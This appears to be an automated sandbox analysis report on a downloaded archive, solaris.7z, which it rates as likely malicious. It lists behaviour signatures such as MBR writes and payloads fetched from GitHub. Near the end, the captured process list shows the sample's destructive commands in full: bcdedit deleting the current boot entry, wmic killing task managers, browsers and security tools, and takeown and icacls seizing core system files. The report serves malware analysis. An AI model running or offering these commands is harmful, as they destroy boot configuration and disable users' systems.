Analysis Overview
Threat Level: Likely malicious
The file https://archive.org/details/solaris.7z was found to be: Likely malicious.
Malicious Activity Summary
Drops file in Drivers directory
Possible privilege escalation attempt
Downloads MZ/PE file
Executes dropped EXE
Modifies file permissions
Modifies boot configuration data using bcdedit
Legitimate hosting services abused for malware hosting/C2
Writes to the Master Boot Record (MBR)
Enumerates physical storage devices
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Suspicious use of SendNotifyMessage
Suspicious use of AdjustPrivilegeToken
Checks processor information in registry
Modifies data under HKEY_USERS
Suspicious behavior: GetForegroundWindowSpam
Suspicious use of SetWindowsHookEx
Enumerates system info in registry
Modifies registry class
NTFS ADS
Suspicious behavior: EnumeratesProcesses
Suspicious use of FindShellTrayWindow
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2024-06-17 11:06
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-17 11:06
Reported
2024-06-17 11:08
Platform
win11-20240611-en
Max time kernel
109s
Max time network
108s
Command Line
Signatures
Downloads MZ/PE file
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\drivers\rteth.sys | C:\Windows\system32\cmd.exe | N/A |
Possible privilege escalation attempt
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Downloads\0x07.exe | N/A |
| N/A | N/A | C:\Windows\Temp\winconfig.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\DetectKey.exe | N/A |
Modifies file permissions
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Modifies boot configuration data using bcdedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
Writes to the Master Boot Record (MBR)
| Description | Indicator | Process | Target |
| File opened for modification | \??\PhysicalDrive0 | C:\Users\Admin\Downloads\0x07.exe | N/A |
Enumerates physical storage devices
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133630959976225828" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
NTFS ADS
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\Downloads\Solaris 2.0(1).z01:Zone.Identifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| File opened for modification | C:\Users\Admin\Downloads\0x07.exe:Zone.Identifier | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File opened for modification | C:\Users\Admin\Downloads\solaris.7z_archive.torrent:Zone.Identifier | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File opened for modification | C:\Users\Admin\Downloads\Solaris 2.0.z01:Zone.Identifier | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://archive.org/details/solaris.7z
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fff57c9ab58,0x7fff57c9ab68,0x7fff57c9ab78
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1576 --field-trial-handle=1792,i,13500081886312520303,9758504955780823199,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2016 --field-trial-handle=1792,i,13500081886312520303,9758504955780823199,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2100 --field-trial-handle=1792,i,13500081886312520303,9758504955780823199,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3008 --field-trial-handle=1792,i,13500081886312520303,9758504955780823199,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3040 --field-trial-handle=1792,i,13500081886312520303,9758504955780823199,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3976 --field-trial-handle=1792,i,13500081886312520303,9758504955780823199,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3920 --field-trial-handle=1792,i,13500081886312520303,9758504955780823199,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4592 --field-trial-handle=1792,i,13500081886312520303,9758504955780823199,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4608 --field-trial-handle=1792,i,13500081886312520303,9758504955780823199,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4708 --field-trial-handle=1792,i,13500081886312520303,9758504955780823199,131072 /prefetch:8
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url "C:\Users\Admin\Downloads\solaris.7z_archive.torrent"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url C:\Users\Admin\Downloads\solaris.7z_archive.torrent
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2088.0.1255573130\1104584131" -parentBuildID 20230214051806 -prefsHandle 1816 -prefMapHandle 1808 -prefsLen 22074 -prefMapSize 235121 -appDir "C:\Program Files\Mozilla Firefox\browser" - {306f3244-0cdc-48e3-bd77-856750999af3} 2088 "\\.\pipe\gecko-crash-server-pipe.2088" 1692 27921624358 gpu
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2088.1.130520592\629183892" -parentBuildID 20230214051806 -prefsHandle 2412 -prefMapHandle 2408 -prefsLen 22925 -prefMapSize 235121 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2a0395cc-1a68-4567-81da-ef9544c0b857} 2088 "\\.\pipe\gecko-crash-server-pipe.2088" 2424 2790d38a058 socket
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2088.2.1275746739\19456807" -childID 1 -isForBrowser -prefsHandle 2940 -prefMapHandle 2936 -prefsLen 23028 -prefMapSize 235121 -jsInitHandle 1352 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {165faf58-3bd3-41e4-b247-1687c5fc6554} 2088 "\\.\pipe\gecko-crash-server-pipe.2088" 2952 27924538b58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2088.3.136152863\147203189" -childID 2 -isForBrowser -prefsHandle 3260 -prefMapHandle 2676 -prefsLen 27614 -prefMapSize 235121 -jsInitHandle 1352 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {36d7590d-d716-454b-b959-3b47c54d116c} 2088 "\\.\pipe\gecko-crash-server-pipe.2088" 3312 27926bb8558 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2088.4.898846559\550091554" -childID 3 -isForBrowser -prefsHandle 3380 -prefMapHandle 5116 -prefsLen 27695 -prefMapSize 235121 -jsInitHandle 1352 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f0a2dc17-8951-4e5d-adeb-002ea334a4f3} 2088 "\\.\pipe\gecko-crash-server-pipe.2088" 5128 2790d3e4858 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2088.5.1114950978\2024425473" -childID 4 -isForBrowser -prefsHandle 5268 -prefMapHandle 5272 -prefsLen 27695 -prefMapSize 235121 -jsInitHandle 1352 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3a6444d9-66c6-4a56-a783-82458bcd37ed} 2088 "\\.\pipe\gecko-crash-server-pipe.2088" 5260 2790d3e5a58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2088.6.2119703448\2051035194" -childID 5 -isForBrowser -prefsHandle 5464 -prefMapHandle 5468 -prefsLen 27695 -prefMapSize 235121 -jsInitHandle 1352 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ebbc7003-dfd3-4e89-a4d3-539054643466} 2088 "\\.\pipe\gecko-crash-server-pipe.2088" 5452 2790d3e6f58 tab
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=4996 --field-trial-handle=1792,i,13500081886312520303,9758504955780823199,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=4632 --field-trial-handle=1792,i,13500081886312520303,9758504955780823199,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5104 --field-trial-handle=1792,i,13500081886312520303,9758504955780823199,131072 /prefetch:8
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url "C:\Users\Admin\Downloads\Solaris 2.0.z01"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url "C:\Users\Admin\Downloads\Solaris 2.0.z01"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2368.0.1506848468\107678083" -parentBuildID 20230214051806 -prefsHandle 1724 -prefMapHandle 1716 -prefsLen 22074 -prefMapSize 235121 -appDir "C:\Program Files\Mozilla Firefox\browser" - {a25e2286-3aa1-4fe0-887e-1481695ed5f3} 2368 "\\.\pipe\gecko-crash-server-pipe.2368" 1832 22a6d9ebc58 gpu
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2368.1.365329882\1437661136" -parentBuildID 20230214051806 -prefsHandle 2340 -prefMapHandle 2336 -prefsLen 22925 -prefMapSize 235121 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {eaa21eef-f200-45b7-bb68-fd4a6178b867} 2368 "\\.\pipe\gecko-crash-server-pipe.2368" 2360 22a5a68a258 socket
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2368.2.2021011797\658887305" -childID 1 -isForBrowser -prefsHandle 2904 -prefMapHandle 2900 -prefsLen 22963 -prefMapSize 235121 -jsInitHandle 1348 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {128ed8b5-2b26-4aad-aca5-31c6c18e0dba} 2368 "\\.\pipe\gecko-crash-server-pipe.2368" 2888 22a712e6e58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2368.3.666181311\866608131" -childID 2 -isForBrowser -prefsHandle 3552 -prefMapHandle 3548 -prefsLen 27614 -prefMapSize 235121 -jsInitHandle 1348 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {bffd2db9-4a34-49fc-9567-5930e803b96c} 2368 "\\.\pipe\gecko-crash-server-pipe.2368" 3564 22a741cb558 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2368.4.724873211\954148448" -childID 3 -isForBrowser -prefsHandle 5196 -prefMapHandle 5192 -prefsLen 27614 -prefMapSize 235121 -jsInitHandle 1348 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a339b070-7112-42ef-99a4-c820d8e6f2e1} 2368 "\\.\pipe\gecko-crash-server-pipe.2368" 5204 22a746ce558 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2368.5.1858377365\2066612119" -childID 4 -isForBrowser -prefsHandle 5420 -prefMapHandle 5416 -prefsLen 27614 -prefMapSize 235121 -jsInitHandle 1348 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d5139762-4e65-4a65-b1b6-744cb438f098} 2368 "\\.\pipe\gecko-crash-server-pipe.2368" 5428 22a75e48c58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2368.6.1916752819\2099547351" -childID 5 -isForBrowser -prefsHandle 5604 -prefMapHandle 5600 -prefsLen 27614 -prefMapSize 235121 -jsInitHandle 1348 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {27ae60ad-4f0f-49f1-ae5f-a299f76ebb1c} 2368 "\\.\pipe\gecko-crash-server-pipe.2368" 5612 22a75e49858 tab
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3132 --field-trial-handle=1792,i,13500081886312520303,9758504955780823199,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3464 --field-trial-handle=1792,i,13500081886312520303,9758504955780823199,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5584 --field-trial-handle=1792,i,13500081886312520303,9758504955780823199,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3112 --field-trial-handle=1792,i,13500081886312520303,9758504955780823199,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5580 --field-trial-handle=1792,i,13500081886312520303,9758504955780823199,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5488 --field-trial-handle=1792,i,13500081886312520303,9758504955780823199,131072 /prefetch:8
C:\Users\Admin\Downloads\0x07.exe
"C:\Users\Admin\Downloads\0x07.exe"
C:\Windows\Temp\winconfig.exe
"C:\Windows\Temp\winconfig.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\D82B.tmp\D82C.tmp\D82D.bat C:\Windows\Temp\winconfig.exe"
C:\Users\Admin\AppData\Roaming\DetectKey.exe
"C:\Users\Admin\AppData\Roaming\DetectKey.exe"
C:\Windows\system32\bcdedit.exe
bcdedit /delete {current}
C:\Windows\System32\Wbem\WMIC.exe
wmic process where name='taskmgr.exe' delete /nointeractive
C:\Windows\System32\Wbem\WMIC.exe
wmic process where name='perfmon.exe' delete /nointeractive
C:\Windows\System32\Wbem\WMIC.exe
wmic process where name='mmc.exe' delete /nointeractive
C:\Windows\System32\Wbem\WMIC.exe
wmic process where name='PartAssist.exe' delete /nointeractive
C:\Windows\System32\Wbem\WMIC.exe
wmic process where name='control.exe' delete /nointeractive
C:\Windows\System32\Wbem\WMIC.exe
wmic process where name='ProcessHacker.exe' delete /nointeractive
C:\Windows\System32\Wbem\WMIC.exe
wmic process where name='Security Task Manager.exe' delete /nointeractive
C:\Windows\System32\Wbem\WMIC.exe
wmic process where name='Security Task Manager Protable.exe' delete /nointeractive
C:\Windows\System32\Wbem\WMIC.exe
wmic process where name='CCleaner.exe' delete /nointeractive
C:\Windows\System32\Wbem\WMIC.exe
wmic process where name='procexp.exe' delete /nointeractive
C:\Windows\System32\Wbem\WMIC.exe
wmic process where name='procexp64.exe' delete /nointeractive
C:\Windows\System32\Wbem\WMIC.exe
wmic process where name='procexp64a.exe' delete /nointeractive
C:\Windows\System32\Wbem\WMIC.exe
wmic process where name='logonui.exe' delete /nointeractive
C:\Windows\System32\Wbem\WMIC.exe
wmic process where name='regedit.exe' delete /nointeractive
C:\Windows\System32\Wbem\WMIC.exe
wmic process where name='iexplore.exe' delete /nointeractive
C:\Windows\System32\Wbem\WMIC.exe
wmic process where name='chrome.exe' delete /nointeractive
C:\Windows\System32\Wbem\WMIC.exe
wmic process where name='firefox.exe' delete /nointeractive
C:\Windows\System32\Wbem\WMIC.exe
wmic process where name='opera.exe' delete /nointeractive
C:\Windows\System32\Wbem\WMIC.exe
wmic process where name='edge.exe' delete /nointeractive
C:\Windows\System32\Wbem\WMIC.exe
wmic process where name='msedge.exe' delete /nointeractive
C:\Windows\System32\Wbem\WMIC.exe
wmic process where name='brave.exe' delete /nointeractive
C:\Windows\System32\Wbem\WMIC.exe
wmic process where name='wmplayer.exe' delete /nointeractive
C:\Windows\System32\Wbem\WMIC.exe
wmic process where name='notepad.exe' delete /nointeractive
C:\Windows\System32\Wbem\WMIC.exe
wmic process where name='notepad++.exe' delete /nointeractive
C:\Windows\System32\Wbem\WMIC.exe
wmic process where name='taskmgr.exe' delete /nointeractive
C:\Windows\System32\Wbem\WMIC.exe
wmic process where name='perfmon.exe' delete /nointeractive
C:\Windows\System32\Wbem\WMIC.exe
wmic process where name='logonui.exe' delete /nointeractive
C:\Windows\System32\Wbem\WMIC.exe
wmic process where name='ProcessHacker.exe' delete /nointeractive
C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\system32\taskmgr.exe"
C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\system32\hal.dll"
C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\system32\winload.exe"
C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\system32\ntoskrnl.exe"
C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\system32\perfmon.exe"
C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\system32\resmon.exe"
C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\system32\logonui.exe
C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\system32\taskkill.exe"
C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\system32\tasklist.exe"
C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\system32\tskill.exe"
C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\system32\logonui.exe"
C:\Windows\system32\takeown.exe
takeown /f "C:\Program Files\Process Hacker 2"
C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32\drivers"
C:\Windows\System32\Wbem\WMIC.exe
wmic process where name='taskmgr.exe' delete /nointeractive
C:\Windows\System32\Wbem\WMIC.exe
wmic process where name='perfmon.exe' delete /nointeractive
C:\Windows\System32\Wbem\WMIC.exe
wmic process where name='logonui.exe' delete /nointeractive
C:\Windows\System32\Wbem\WMIC.exe
wmic process where name='ProcessHacker.exe' delete /nointeractive
C:\Windows\system32\icacls.exe
icacls "C:\Windows\system32\taskmgr.exe" /grant "everyone":F
C:\Windows\system32\icacls.exe
icacls "C:\Windows\system32\hal.dll" /grant "everyone":F
